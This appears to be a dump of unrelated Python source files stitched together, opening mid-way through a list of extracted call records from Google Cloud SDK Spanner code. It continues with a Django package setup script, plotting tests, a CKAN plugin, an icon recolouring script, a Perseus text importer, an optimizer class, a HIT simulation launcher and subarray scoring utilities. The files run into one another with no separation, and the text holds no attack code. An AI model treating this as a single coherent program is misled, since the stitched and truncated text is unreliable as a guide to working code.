'googlecloudsdk.api_lib.util.apis.GetMessagesModule', 'apis.GetMessagesModule', (['"""spanner"""', '"""v1"""'], {}), "('spanner', 'v1')\n", (1679, 1696), False, 'from googlecloudsdk.api_lib.util import apis\n'), ((1831, 1956), 'apitools.base.py.list_pager.YieldFromList', 'list_pager.YieldFromList', (['client.projects_instanceConfigs', 'req'], {'field': '"""instanceConfigs"""', 'batch_size_attribute': '"""pageSize"""'}), "(client.projects_instanceConfigs, req, field=\n 'instanceConfigs', batch_size_attribute='pageSize')\n", (1855, 1956), False, 'from apitools.base.py import list_pager\n'), ((2077, 2116), 'googlecloudsdk.api_lib.util.apis.GetClientInstance', 'apis.GetClientInstance', (['"""spanner"""', '"""v1"""'], {}), "('spanner', 'v1')\n", (2099, 2116), False, 'from googlecloudsdk.api_lib.util import apis\n'), ((2126, 2165), 'googlecloudsdk.api_lib.util.apis.GetMessagesModule', 'apis.GetMessagesModule', (['"""spanner"""', '"""v1"""'], {}), "('spanner', 'v1')\n", (2148, 2165), False, 'from googlecloudsdk.api_lib.util import apis\n'), ((2174, 2323), 'googlecloudsdk.core.resources.REGISTRY.Parse', 'resources.REGISTRY.Parse', (['config'], {'params': "{'projectsId': properties.VALUES.core.project.GetOrFail}", 'collection': '"""spanner.projects.instanceConfigs"""'}), "(config, params={'projectsId': properties.VALUES.\n core.project.GetOrFail}, collection='spanner.projects.instanceConfigs')\n", (2198, 2323), False, 'from googlecloudsdk.core import resources\n'), ((2742, 2781), 'googlecloudsdk.api_lib.util.apis.GetClientInstance', 'apis.GetClientInstance', (['"""spanner"""', '"""v1"""'], {}), "('spanner', 'v1')\n", (2764, 2781), False, 'from googlecloudsdk.api_lib.util import apis\n'), ((2791, 2830), 'googlecloudsdk.api_lib.util.apis.GetMessagesModule', 'apis.GetMessagesModule', (['"""spanner"""', '"""v1"""'], {}), "('spanner', 'v1')\n", (2813, 2830), False, 'from googlecloudsdk.api_lib.util import apis\n'), ((2847, 2950), 'googlecloudsdk.core.resources.REGISTRY.Create', 'resources.REGISTRY.Create', (['"""spanner.projects"""'], {'projectsId': 'properties.VALUES.core.project.GetOrFail'}), "('spanner.projects', projectsId=properties.VALUES.\n core.project.GetOrFail)\n", (2872, 2950), False, 'from googlecloudsdk.core import resources\n'), ((2968, 3117), 'googlecloudsdk.core.resources.REGISTRY.Parse', 'resources.REGISTRY.Parse', (['config'], {'params': "{'projectsId': properties.VALUES.core.project.GetOrFail}", 'collection': '"""spanner.projects.instanceConfigs"""'}), "(config, params={'projectsId': properties.VALUES.\n core.project.GetOrFail}, collection='spanner.projects.instanceConfigs')\n", (2992, 3117), False, 'from googlecloudsdk.core import resources\n'), ((4656, 4695), 'googlecloudsdk.api_lib.util.apis.GetClientInstance', 'apis.GetClientInstance', (['"""spanner"""', '"""v1"""'], {}), "('spanner', 'v1')\n", (4678, 4695), False, 'from googlecloudsdk.api_lib.util import apis\n'), ((4705, 4744), 'googlecloudsdk.api_lib.util.apis.GetMessagesModule', 'apis.GetMessagesModule', (['"""spanner"""', '"""v1"""'], {}), "('spanner', 'v1')\n", (4727, 4744), False, 'from googlecloudsdk.api_lib.util import apis\n'), ((4753, 4912), 'googlecloudsdk.core.resources.REGISTRY.Parse', 'resources.REGISTRY.Parse', (['args.config'], {'params': "{'projectsId': properties.VALUES.core.project.GetOrFail}", 'collection': '"""spanner.projects.instanceConfigs"""'}), "(args.config, params={'projectsId': properties.\n VALUES.core.project.GetOrFail}, collection=\n 'spanner.projects.instanceConfigs')\n", (4777, 4912), False, 'from googlecloudsdk.core import resources\n'), ((5380, 5467), 'googlecloudsdk.command_lib.util.args.labels_util.ProcessUpdateArgsLazy', 'labels_util.ProcessUpdateArgsLazy', (['args', 'msgs.InstanceConfig.LabelsValue', 'GetLabels'], {}), '(args, msgs.InstanceConfig.LabelsValue,\n GetLabels)\n', (5413, 5467), False, 'from googlecloudsdk.command_lib.util.args import labels_util\n'), ((5620, 5674), 'googlecloudsdk.command_lib.ai.errors.NoFieldsSpecifiedError', 'errors.NoFieldsSpecifiedError', (['"""No updates requested."""'], {}), "('No updates requested.')\n", (5649, 5674), False, 'from googlecloudsdk.command_lib.ai import errors\n'), ((1778, 1820), 'googlecloudsdk.core.properties.VALUES.core.project.GetOrFail', 'properties.VALUES.core.project.GetOrFail', ([], {}), '()\n', (1818, 1820), False, 'from googlecloudsdk.core import properties\n'), ((4063, 4084), 'six.iteritems', 'six.iteritems', (['labels'], {}), '(labels)\n', (4076, 4084), False, 'import six\n')] |
from setuptools import setup
import pkg_resources
import autocomplete
def get_metadata_version():
"""
Tries to get the version from the django_autocomplete.egg-info directory.
"""
try:
pkg = list(pkg_resources.find_distributions('.', True))[0]
except IndexError:
return autocomplete.__version__
return pkg.version
version = autocomplete.get_mercurial_version() or get_metadata_version()
setup(
name = 'django-autocomplete',
version = version,
description = 'autocomplete utilities for django',
author = '<NAME>',
author_email = '<EMAIL>',
url = 'http://bitbucket.org/tyrion/django-autocomplete',
download_url = 'http://bitbucket.org/tyrion/django-autocomplete/downloads',
packages = ['autocomplete'],
include_package_data = True,
classifiers = [
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Utilities'
],
)
| [
"pkg_resources.find_distributions",
"autocomplete.get_mercurial_version",
"setuptools.setup"
] | [((431, 1075), 'setuptools.setup', 'setup', ([], {'name': '"""django-autocomplete"""', 'version': 'version', 'description': '"""autocomplete utilities for django"""', 'author': '"""<NAME>"""', 'author_email': '"""<EMAIL>"""', 'url': '"""http://bitbucket.org/tyrion/django-autocomplete"""', 'download_url': '"""http://bitbucket.org/tyrion/django-autocomplete/downloads"""', 'packages': "['autocomplete']", 'include_package_data': '(True)', 'classifiers': "['Development Status :: 4 - Beta', 'Environment :: Web Environment',\n 'Framework :: Django', 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent', 'Programming Language :: Python',\n 'Topic :: Utilities']"}), "(name='django-autocomplete', version=version, description=\n 'autocomplete utilities for django', author='<NAME>', author_email=\n '<EMAIL>', url='http://bitbucket.org/tyrion/django-autocomplete',\n download_url=\n 'http://bitbucket.org/tyrion/django-autocomplete/downloads', packages=[\n 'autocomplete'], include_package_data=True, classifiers=[\n 'Development Status :: 4 - Beta', 'Environment :: Web Environment',\n 'Framework :: Django', 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent', 'Programming Language :: Python',\n 'Topic :: Utilities'])\n", (436, 1075), False, 'from setuptools import setup\n'), ((367, 403), 'autocomplete.get_mercurial_version', 'autocomplete.get_mercurial_version', ([], {}), '()\n', (401, 403), False, 'import autocomplete\n'), ((222, 265), 'pkg_resources.find_distributions', 'pkg_resources.find_distributions', (['"""."""', '(True)'], {}), "('.', True)\n", (254, 265), False, 'import pkg_resources\n')] |
# -*- coding: utf-8 -*-
"""Testing the functions in typhon.plots.
"""
import os
from typhon import plots
class TestPlots:
"""Testing the plot functions."""
def test_figsize(self):
"""Test golden ratio for figures sizes."""
ret = plots.figsize(10)
assert ret == (10, 6.1803398874989481)
def test_get_subplot_arrangement(self):
"""Test the determination of subplot arrangements."""
shape = plots.get_subplot_arrangement(8)
assert shape == (3, 3)
def test_get_available_styles(self):
"""Check matplotlib stylesheet paths.
This test checks the consinstency of the in and outputs
of styles() and get_available_styles().
"""
style_paths = [
plots.styles(s) for s in plots.get_available_styles()]
assert all(os.path.isfile(s) for s in style_paths)
| [
"typhon.plots.get_subplot_arrangement",
"typhon.plots.styles",
"os.path.isfile",
"typhon.plots.get_available_styles",
"typhon.plots.figsize"
] | [((256, 273), 'typhon.plots.figsize', 'plots.figsize', (['(10)'], {}), '(10)\n', (269, 273), False, 'from typhon import plots\n'), ((445, 477), 'typhon.plots.get_subplot_arrangement', 'plots.get_subplot_arrangement', (['(8)'], {}), '(8)\n', (474, 477), False, 'from typhon import plots\n'), ((758, 773), 'typhon.plots.styles', 'plots.styles', (['s'], {}), '(s)\n', (770, 773), False, 'from typhon import plots\n'), ((783, 811), 'typhon.plots.get_available_styles', 'plots.get_available_styles', ([], {}), '()\n', (809, 811), False, 'from typhon import plots\n'), ((833, 850), 'os.path.isfile', 'os.path.isfile', (['s'], {}), '(s)\n', (847, 850), False, 'import os\n')] |
# encoding: utf-8
import ckan.plugins as plugins
import ckan.plugins.toolkit as toolkit
import logging
try:
from ckan.common import config # CKAN 2.7 and later
except ImportError:
from pylons import config # CKAN 2.7 and later
log = logging.getLogger(__name__)
def dataset_count():
"""Return a count of all datasets"""
count = 0
result = toolkit.get_action('package_search')({}, {'rows': 1})
if result.get('count'):
count = result.get('count')
return count
def get_hero_images():
resources = []
try:
package_id = config.get('ckanext.heroslider.package_id', 'hero-slider-images')
result = toolkit.get_action('package_show')({}, {'id': package_id})
resource_list = result.get('resources')
for item in resource_list:
if item.get('format') in ['JPEG','PNG']:
if item.get('url'):
resources.append(item.get('url'))
except:
log.debug('Getting Hero images failed')
return resources
class HerosliderPlugin(plugins.SingletonPlugin):
plugins.implements(plugins.IConfigurer)
plugins.implements(plugins.ITemplateHelpers)
# IConfigurer
def update_config(self, config_):
toolkit.add_template_directory(config_, 'templates')
toolkit.add_public_directory(config_, 'public')
toolkit.add_resource('fanstatic', 'heroslider')
# ITemplateHelpers
def get_helpers(self):
return {
'hero_dataset_count': dataset_count,
'get_hero_images': get_hero_images,
}
| [
"ckan.plugins.implements",
"pylons.config.get",
"ckan.plugins.toolkit.add_template_directory",
"ckan.plugins.toolkit.get_action",
"ckan.plugins.toolkit.add_public_directory",
"ckan.plugins.toolkit.add_resource",
"logging.getLogger"
] | [((243, 270), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (260, 270), False, 'import logging\n'), ((1074, 1113), 'ckan.plugins.implements', 'plugins.implements', (['plugins.IConfigurer'], {}), '(plugins.IConfigurer)\n', (1092, 1113), True, 'import ckan.plugins as plugins\n'), ((1118, 1162), 'ckan.plugins.implements', 'plugins.implements', (['plugins.ITemplateHelpers'], {}), '(plugins.ITemplateHelpers)\n', (1136, 1162), True, 'import ckan.plugins as plugins\n'), ((362, 398), 'ckan.plugins.toolkit.get_action', 'toolkit.get_action', (['"""package_search"""'], {}), "('package_search')\n", (380, 398), True, 'import ckan.plugins.toolkit as toolkit\n'), ((570, 635), 'pylons.config.get', 'config.get', (['"""ckanext.heroslider.package_id"""', '"""hero-slider-images"""'], {}), "('ckanext.heroslider.package_id', 'hero-slider-images')\n", (580, 635), False, 'from pylons import config\n'), ((1229, 1281), 'ckan.plugins.toolkit.add_template_directory', 'toolkit.add_template_directory', (['config_', '"""templates"""'], {}), "(config_, 'templates')\n", (1259, 1281), True, 'import ckan.plugins.toolkit as toolkit\n'), ((1290, 1337), 'ckan.plugins.toolkit.add_public_directory', 'toolkit.add_public_directory', (['config_', '"""public"""'], {}), "(config_, 'public')\n", (1318, 1337), True, 'import ckan.plugins.toolkit as toolkit\n'), ((1346, 1393), 'ckan.plugins.toolkit.add_resource', 'toolkit.add_resource', (['"""fanstatic"""', '"""heroslider"""'], {}), "('fanstatic', 'heroslider')\n", (1366, 1393), True, 'import ckan.plugins.toolkit as toolkit\n'), ((653, 687), 'ckan.plugins.toolkit.get_action', 'toolkit.get_action', (['"""package_show"""'], {}), "('package_show')\n", (671, 687), True, 'import ckan.plugins.toolkit as toolkit\n')] |
'''
This file is used for changing icons color from black to white, so icon color could be
changed in code.
Icon images are from https://github.com/iconic/open-iconic/tree/master/png
'''
import os
from PIL import Image # https://pillow.readthedocs.io/en/stable/
def find_files():
""" Finds all files from icons folder that name ends with .png """
directory = os.fsencode( "icons/") # Gets folder where icons are located
for file in os.listdir(directory): # Gets every file from folder
filename = os.fsdecode(file)
if filename.endswith(".png"):
change_color("icons/" + filename)
continue
else:
continue
def change_color(image):
""" Changes every black pixel to white from image that was send to it. Skips transperent pixels """
newimage = Image.open(image)
for x in range(newimage.size[0]):# Goes trought every pixel of image in X axis
for y in range(newimage.size[1]): # In Y axis
r,g,b,a = newimage.getpixel((x,y)) # Get pixels color in rgb
if r == 0 and g == 0 and b == 0 and a > 0: # If pixel is black and not transparent.
newimage.putpixel((x,y), (255,255,255,a)) # Change color to white. Keep transperency.
newimage.save(image) # Saves a file over the old one.
| [
"os.fsdecode",
"os.fsencode",
"os.listdir",
"PIL.Image.open"
] | [((370, 391), 'os.fsencode', 'os.fsencode', (['"""icons/"""'], {}), "('icons/')\n", (381, 391), False, 'import os\n'), ((449, 470), 'os.listdir', 'os.listdir', (['directory'], {}), '(directory)\n', (459, 470), False, 'import os\n'), ((832, 849), 'PIL.Image.open', 'Image.open', (['image'], {}), '(image)\n', (842, 849), False, 'from PIL import Image\n'), ((521, 538), 'os.fsdecode', 'os.fsdecode', (['file'], {}), '(file)\n', (532, 538), False, 'import os\n')] |
from django.core.management.base import BaseCommand
from reader.importer.PerseusBatchImporter import PerseusBatchImporter
from reader.importer.batch_import import JSONImportPolicy
import os
import sys
class Command(BaseCommand):
help = "Imports all Perseus XML documents from a directory that match the import policy"
def add_arguments(self, parser):
parser.add_argument('-d', '--directory',
dest='directory',
help='The directory containing the files to import')
parser.add_argument('-o', '--overwrite',
action="store_true",
dest="overwrite",
default=False,
help="Overwrite and replace existing items")
parser.add_argument("-t", "--test",
action="store_true",
dest="test",
help="Output the import parameters for any works that would be imported")
def handle(self, *args, **options):
directory = options['directory']
if directory is None and len(args) > 0:
directory = args[0]
# Validate the arguments
if directory is None:
print("No directory was provided to import")
return
overwrite = options['overwrite']
if overwrite is None:
overwrite = False
elif overwrite in [True, False]:
pass # Already a boolean
elif overwrite.lower() in ["true", "1"]:
overwrite = True
else:
overwrite = False
test = options['test']
if test is None:
test = False
elif test in [True, False]:
pass # Already a boolean
elif test.lower() in ["true", "1"]:
test = True
else:
test = False
# Get the path to the import policy accounting for the fact that the command may be run outside of the path where manage.py resides
import_policy_file = os.path.join( os.path.split(sys.argv[0])[0], "reader", "importer", "perseus_import_policy.json")
selection_policy = JSONImportPolicy()
selection_policy.load_policy( import_policy_file )
perseus_batch_importer = PerseusBatchImporter(
perseus_directory= directory,
book_selection_policy = selection_policy.should_be_processed,
overwrite_existing = overwrite,
test = test)
if test:
print("Testing import for files from", directory)
else:
print("Importing files from", directory)
perseus_batch_importer.do_import()
if test:
print("Files from the", directory, "evaluated")
else:
print("Files from the", directory, "directory successfully imported")
| [
"reader.importer.batch_import.JSONImportPolicy",
"os.path.split",
"reader.importer.PerseusBatchImporter.PerseusBatchImporter"
] | [((2171, 2189), 'reader.importer.batch_import.JSONImportPolicy', 'JSONImportPolicy', ([], {}), '()\n', (2187, 2189), False, 'from reader.importer.batch_import import JSONImportPolicy\n'), ((2294, 2453), 'reader.importer.PerseusBatchImporter.PerseusBatchImporter', 'PerseusBatchImporter', ([], {'perseus_directory': 'directory', 'book_selection_policy': 'selection_policy.should_be_processed', 'overwrite_existing': 'overwrite', 'test': 'test'}), '(perseus_directory=directory, book_selection_policy=\n selection_policy.should_be_processed, overwrite_existing=overwrite,\n test=test)\n', (2314, 2453), False, 'from reader.importer.PerseusBatchImporter import PerseusBatchImporter\n'), ((2050, 2076), 'os.path.split', 'os.path.split', (['sys.argv[0]'], {}), '(sys.argv[0])\n', (2063, 2076), False, 'import os\n')] |
"""An "optimizer" that draws random samples.
Scientific Machine Learning Benchmark
A benchmark of regression models in chem- and materials informatics.
2019-2020, Citrine Informatics.
"""
from typing import Optional, Any
from smlb import (
params,
Random,
RandomVectorSampler,
VectorSpaceData,
Optimizer,
TrackedTransformation,
)
class RandomOptimizer(Optimizer, Random):
"""Draws random samples.
Parameters:
num_samples: the number of random samples to draw
domain: optional domain from which to draw values. If not provided, then the
optimization domain is taken to be that of `data` parameter passed to `optimize()`.
rng: pseudo-random number generator
"""
def __init__(self, num_samples: int, domain: Optional[Any] = None, rng=None, **kwargs):
super().__init__(rng=rng, **kwargs)
self._num_samples = params.integer(num_samples, above=0)
self._sampler = RandomVectorSampler(size=self._num_samples, domain=domain, rng=rng)
def _minimize(self, data: VectorSpaceData, function_tracker: TrackedTransformation):
"""Generate num_samples random samples and evaluate them."""
samples = self._sampler.apply(data)
function_tracker.apply(samples)
| [
"smlb.RandomVectorSampler",
"smlb.params.integer"
] | [((903, 939), 'smlb.params.integer', 'params.integer', (['num_samples'], {'above': '(0)'}), '(num_samples, above=0)\n', (917, 939), False, 'from smlb import params, Random, RandomVectorSampler, VectorSpaceData, Optimizer, TrackedTransformation\n'), ((964, 1031), 'smlb.RandomVectorSampler', 'RandomVectorSampler', ([], {'size': 'self._num_samples', 'domain': 'domain', 'rng': 'rng'}), '(size=self._num_samples, domain=domain, rng=rng)\n', (983, 1031), False, 'from smlb import params, Random, RandomVectorSampler, VectorSpaceData, Optimizer, TrackedTransformation\n')] |
try:
import orjson as json
except ImportError:
import json
import toml
import yaml
def format_requirements(data: dict) -> str:
result = []
for group, values in data.items():
result.append(f"### {group.upper()}\n")
for extras, version in values.items():
result.append(f"{extras}=={version}\n")
return "".join(result)
def formatter(data: dict, format: str) -> str:
if format == "json":
proxy = json.dumps(data)
if isinstance(proxy, bytes):
proxy = proxy.decode()
return proxy
elif format == "toml":
return toml.dumps(data)
elif format == "yaml":
return yaml.dump(data)
elif format == "requirements.txt":
return format_requirements(data)
else:
raise TypeError(f"Invalid format {format}")
| [
"toml.dumps",
"yaml.dump",
"json.dumps"
] | [((457, 473), 'json.dumps', 'json.dumps', (['data'], {}), '(data)\n', (467, 473), False, 'import json\n'), ((609, 625), 'toml.dumps', 'toml.dumps', (['data'], {}), '(data)\n', (619, 625), False, 'import toml\n'), ((668, 683), 'yaml.dump', 'yaml.dump', (['data'], {}), '(data)\n', (677, 683), False, 'import yaml\n')] |
#!/usr/bin/env python3
import os, numpy as np, argparse
def relFit(nu, eps): return 7.33972668 * np.power(eps, 1/6.0) / np.sqrt(nu)
def etaFit(nu, eps): return np.power(eps, -0.25) * np.power(nu, 0.75)
def lambdaFit(nu, eps): return 5.35507603 * np.power(eps,-1/6.0) * np.sqrt(nu);
def runspec(nu, eps, run, cs):
if cs is not None:
return "HITBND_LES_EXT2pi_EPS%.03f_NU%.04f_CS%.02f_RUN%d" \
% (eps, nu, run, cs)
else:
return "HITBND_DNS_EXT2pi_EPS%.03f_NU%.04f_RUN%d" \
% (eps, nu, run)
def getSettings(nu, eps, cs):
if cs is not None:
options = '-sgs SSM -cs %f -bpdx 4 -bpdy 4 -bpdz 4 -CFL 0.1 ' % cs
else:
options = '-bpdx 12 -bpdy 12 -bpdz 12 -CFL 0.02 '
tAnalysis = np.sqrt(nu / eps)
return options + '-extentx 6.2831853072 -dump2D 0 -dump3D 0 ' \
'-tdump 1 -BC_x periodic -BC_y periodic -BC_z periodic ' \
'-spectralIC fromFit -initCond HITurbulence -tAnalysis %f ' \
'-compute-dissipation 1 -nprocsx 1 -nprocsy 1 -nprocsz 1 ' \
'-spectralForcing 1 -tend 100 -keepMomentumConstant 1 ' \
'-analysis HIT -nu %f -energyInjectionRate %f ' \
% (tAnalysis, nu, eps)
def launchEuler(nu, eps, run):
runname = runspec(nu, eps, run)
print(runname)
tAnalysis = np.sqrt(nu / eps)
os.system("export NU=%f \n export EPS=%f \n export TANALYSIS=%f \n " \
"echo $NU $EPS \n ./launchEuler.sh settingsHIT_DNS.sh %s " \
% (nu, eps, tAnalysis, runname) )
def launchDaint(nCases, les):
SCRATCH = os.getenv('SCRATCH')
HOME = os.getenv('HOME')
f = open('HIT_sbatch','w')
f.write('#!/bin/bash -l \n')
if les: f.write('#SBATCH --job-name=LES_HIT \n')
else: f.write('#SBATCH --job-name=DNS_HIT \n')
f.write('#SBATCH --time=24:00:00 \n')
f.write('#SBATCH --output=out.%j.%a.txt \n')
f.write('#SBATCH --error=err.%j.%a.txt \n')
f.write('#SBATCH --constraint=gpu \n')
f.write('#SBATCH --account=s929 \n')
f.write('#SBATCH --array=0-%d \n' % (nCases-1))
#f.write('#SBATCH --partition=normal \n')
#f.write('#SBATCH --ntasks-per-node=1 \n')
f.write('ind=$SLURM_ARRAY_TASK_ID \n')
if les:
f.write('RUNDIRN=`./launchLESHIT.py --LES --case ${ind} --printName` \n')
f.write('OPTIONS=`./launchLESHIT.py --LES --case ${ind} --printOptions` \n')
else:
f.write('RUNDIRN=`./launchLESHIT.py --case ${ind} --printName` \n')
f.write('OPTIONS=`./launchLESHIT.py --case ${ind} --printOptions` \n')
f.write('mkdir -p %s/CubismUP3D/${RUNDIRN} \n' % SCRATCH)
f.write('cd %s/CubismUP3D/${RUNDIRN} \n' % SCRATCH)
f.write('cp %s/CubismUP_3D/bin/simulation ./exec \n' % HOME)
f.write('export OMP_NUM_THREADS=12 \n')
f.write('export CRAY_CUDA_MPS=1 \n')
f.write('srun --ntasks 1 --ntasks-per-node=1 ./exec ${OPTIONS} \n')
f.close()
os.system('sbatch HIT_sbatch')
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description = "Compute a target file for RL agent from DNS data.")
parser.add_argument('--printName', dest='printName',
action='store_true', help="Only print run name.")
parser.set_defaults(printName=False)
parser.add_argument('--printOptions', dest='printOptions',
action='store_true', help="Only print run options.")
parser.set_defaults(printOptions=False)
parser.add_argument('--launchDaint', dest='launchDaint',
action='store_true', help="Only print run options.")
parser.set_defaults(launchDaint=False)
parser.add_argument('--launchEuler', dest='launchEuler',
action='store_true', help="Only print run options.")
parser.set_defaults(launchEuler=False)
parser.add_argument('--LES', dest='LES', action='store_true',
help="Triggers LES modeling.")
parser.set_defaults(LES=False)
parser.add_argument('--case', type = int, default = -1,
help="Simulation case.")
args = parser.parse_args()
if args.LES: rangeles = np.linspace(0.16, 0.24, 9)
else: rangeles = [None]
NUS, EPS, RUN, CSS = [], [], [], []
h = 2 * np.pi / 16 / 12
for nu in np.logspace(np.log10(0.002), np.log10(0.02), 16) :
for eps in np.logspace(np.log10(0.01), np.log10(2.0), 16) :
if relFit(nu, eps) > 100 or relFit(nu, eps) < 20: continue
if lambdaFit(nu, eps) > 0.1 * 2 * np.pi: continue
if etaFit(nu, eps) > h or etaFit(nu, eps) < h/8: continue
for les in rangeles :
for i in [0, 1, 2] :
NUS,EPS,RUN,CSS = NUS+[nu], EPS+[eps], RUN+[i], CSS+[les]
nCases = len(NUS)
#print('Defined %d cases' % nCases)
if args.launchDaint: launchDaint(nCases, args.LES)
if args.case < 0: cases = range(nCases)
else: cases = [args.case]
for i in cases:
if args.printOptions:
print( getSettings(NUS[i], EPS[i], CSS[i]) )
if args.printName:
print( runspec(NUS[i], EPS[i], RUN[i], CSS[i]) )
if args.launchEuler:
launchEuler(NUS[i], EPS[i], RUN[i])
#for nu in [0.002, 0.004, 0.008] :
# for eps in [0.02, 0.04, 0.08, 0.16, 0.32] :
# tke0 = 2.77578963 * np.power(eps, (2.0/3.0) )
# for scal in [2, 3] :
# tke0 = 2.77578963 * np.power(eps, (2.0/3.0) )
# for scal in [2] :
# ext = scal * np.pi
# os.system("\
# export NU=%f \n\
# export EPS=%f \n\
# export TKE0=%f \n\
# export EXT=%f \n\
# echo $NU $EPS $TKE0 $EXT \n\
# ./launchEuler.sh settingsHIT_DNS.sh HIT_DNS_EXT%dpi_EPS%.02f_NU%.03f"
# % (nu, eps, tke0, ext, scal, eps, nu))
#for nu in [0.001, 0.002, 0.004, 0.008, 0.016] :
# for eps in [0.02, 0.04, 0.08, 0.16, 0.32, 0.64] :
| [
"argparse.ArgumentParser",
"numpy.power",
"os.system",
"numpy.linspace",
"numpy.log10",
"os.getenv",
"numpy.sqrt"
] | [((762, 779), 'numpy.sqrt', 'np.sqrt', (['(nu / eps)'], {}), '(nu / eps)\n', (769, 779), True, 'import os, numpy as np, argparse\n'), ((1307, 1324), 'numpy.sqrt', 'np.sqrt', (['(nu / eps)'], {}), '(nu / eps)\n', (1314, 1324), True, 'import os, numpy as np, argparse\n'), ((1329, 1496), 'os.system', 'os.system', (['("""export NU=%f \n export EPS=%f \n export TANALYSIS=%f \n echo $NU $EPS \n ./launchEuler.sh settingsHIT_DNS.sh %s """\n % (nu, eps, tAnalysis, runname))'], {}), '(\n """export NU=%f \n export EPS=%f \n export TANALYSIS=%f \n echo $NU $EPS \n ./launchEuler.sh settingsHIT_DNS.sh %s """\n % (nu, eps, tAnalysis, runname))\n', (1338, 1496), False, 'import os, numpy as np, argparse\n'), ((1569, 1589), 'os.getenv', 'os.getenv', (['"""SCRATCH"""'], {}), "('SCRATCH')\n", (1578, 1589), False, 'import os, numpy as np, argparse\n'), ((1601, 1618), 'os.getenv', 'os.getenv', (['"""HOME"""'], {}), "('HOME')\n", (1610, 1618), False, 'import os, numpy as np, argparse\n'), ((2900, 2930), 'os.system', 'os.system', (['"""sbatch HIT_sbatch"""'], {}), "('sbatch HIT_sbatch')\n", (2909, 2930), False, 'import os, numpy as np, argparse\n'), ((2972, 3065), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Compute a target file for RL agent from DNS data."""'}), "(description=\n 'Compute a target file for RL agent from DNS data.')\n", (2995, 3065), False, 'import os, numpy as np, argparse\n'), ((124, 135), 'numpy.sqrt', 'np.sqrt', (['nu'], {}), '(nu)\n', (131, 135), True, 'import os, numpy as np, argparse\n'), ((168, 188), 'numpy.power', 'np.power', (['eps', '(-0.25)'], {}), '(eps, -0.25)\n', (176, 188), True, 'import os, numpy as np, argparse\n'), ((191, 209), 'numpy.power', 'np.power', (['nu', '(0.75)'], {}), '(nu, 0.75)\n', (199, 209), True, 'import os, numpy as np, argparse\n'), ((278, 289), 'numpy.sqrt', 'np.sqrt', (['nu'], {}), '(nu)\n', (285, 289), True, 'import os, numpy as np, argparse\n'), ((4009, 4035), 'numpy.linspace', 'np.linspace', (['(0.16)', '(0.24)', '(9)'], {}), '(0.16, 0.24, 9)\n', (4020, 4035), True, 'import os, numpy as np, argparse\n'), ((4159, 4174), 'numpy.log10', 'np.log10', (['(0.002)'], {}), '(0.002)\n', (4167, 4174), True, 'import os, numpy as np, argparse\n'), ((4176, 4190), 'numpy.log10', 'np.log10', (['(0.02)'], {}), '(0.02)\n', (4184, 4190), True, 'import os, numpy as np, argparse\n'), ((101, 123), 'numpy.power', 'np.power', (['eps', '(1 / 6.0)'], {}), '(eps, 1 / 6.0)\n', (109, 123), True, 'import os, numpy as np, argparse\n'), ((255, 278), 'numpy.power', 'np.power', (['eps', '(-1 / 6.0)'], {}), '(eps, -1 / 6.0)\n', (263, 278), True, 'import os, numpy as np, argparse\n'), ((4227, 4241), 'numpy.log10', 'np.log10', (['(0.01)'], {}), '(0.01)\n', (4235, 4241), True, 'import os, numpy as np, argparse\n'), ((4243, 4256), 'numpy.log10', 'np.log10', (['(2.0)'], {}), '(2.0)\n', (4251, 4256), True, 'import os, numpy as np, argparse\n')] |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import defaultdict
import numpy as np
def find_smallest_positive(alist):
# find first positive value
minpos = -1
for x in alist:
if x > 0:
minpos = x
break
if minpos > 0:
# find smallest positive value
for x in alist:
if x > 0 and x < minpos:
minpos = x
return minpos
def rebase_to_smallest_positive(alist):
base = find_smallest_positive(alist)
if base == -1:
return None
else:
return [x - base for x in alist]
def compute_maximum_subarray(score_vector=None):
begin_temp = begin = end = 0
start_val = score_vector[0]
max_ending_here = max_so_far = start_val
for pos, x in enumerate(score_vector[1:], 1):
if max_ending_here < 0:
max_ending_here = x
begin_temp = pos
else:
max_ending_here = max_ending_here + x
if max_ending_here > max_so_far:
max_so_far = max_ending_here
begin = begin_temp
end = pos
return begin, end
def compute_iterated_maximum_subarray(seq=None, score=None, min_subarray_size=None, max_subarray_size=None, output='minimal', margin=1):
original_score = score
while True:
# find (begin,end) of subarray in each element
begin, end = compute_maximum_subarray(score_vector=score)
# check that the retrieved subarray is larger than min_subarray_size
if end - begin < min_subarray_size - 1:
break
else:
# extract maximum subarray
# NOTE: in order to account for border effects we expand on the left and on the right by 'margin'
first = max(0, begin - margin)
# NOTE: we return + 1 for the rightmost postition to be compliant with the 'one after the end' semantics
last = min(len(seq), end + margin + 1)
subarray = seq[first: last]
subarray_size = len(subarray)
if max_subarray_size == -1 or subarray_size <= max_subarray_size:
# store data
acc = 0
for x in original_score[begin: end + 1]:
acc += x
if output == 'minimal':
subarray = {'subarray_string': ''.join(subarray)}
else:
subarray = {'subarray_string': ''.join(subarray), 'subarray': subarray, 'begin': first,
'end': last, 'size': subarray_size, 'seq': seq, 'score': acc}
yield subarray
if subarray_size > max_subarray_size:
# if the subarray is too large then rebase the score list, i.e. offset by the smallest positive value
score = rebase_to_smallest_positive(score)
if score is None:
break
else:
# remove current subarray by zeroing importance values of subarray
score[first: last] = [0.0] * subarray_size
# iterate after removal of current subarray
def extract_sequence_and_score(graph=None):
# make dict with positions as keys and lists of ids as values
pos_to_ids = defaultdict(list)
for u in graph.nodes():
if 'position' not in graph.node[u]: # no position attributes in graph, use the vertex id instead
raise Exception('Missing "position" attribute in node:%s %s' % (u, graph.node[u]))
else:
pos = graph.node[u]['position']
# accumulate all node ids
pos_to_ids[pos] += [u]
# extract sequence of labels and importances
seq = [None] * len(pos_to_ids)
score = [0] * len(pos_to_ids)
for pos in sorted(pos_to_ids):
ids = pos_to_ids[pos]
labels = [graph.node[u].get('label', 'N/A') for u in ids]
# check that all labels for the same position are identical
assert(sum([1 for label in labels if label == labels[0]]) == len(labels)
), 'ERROR: non identical labels referring to same position: %s %s' % (pos, labels)
seq[pos] = labels[0]
# average all importance score for the same position
importances = [graph.node[u].get('importance', 0) for u in ids]
score[pos] = np.mean(importances)
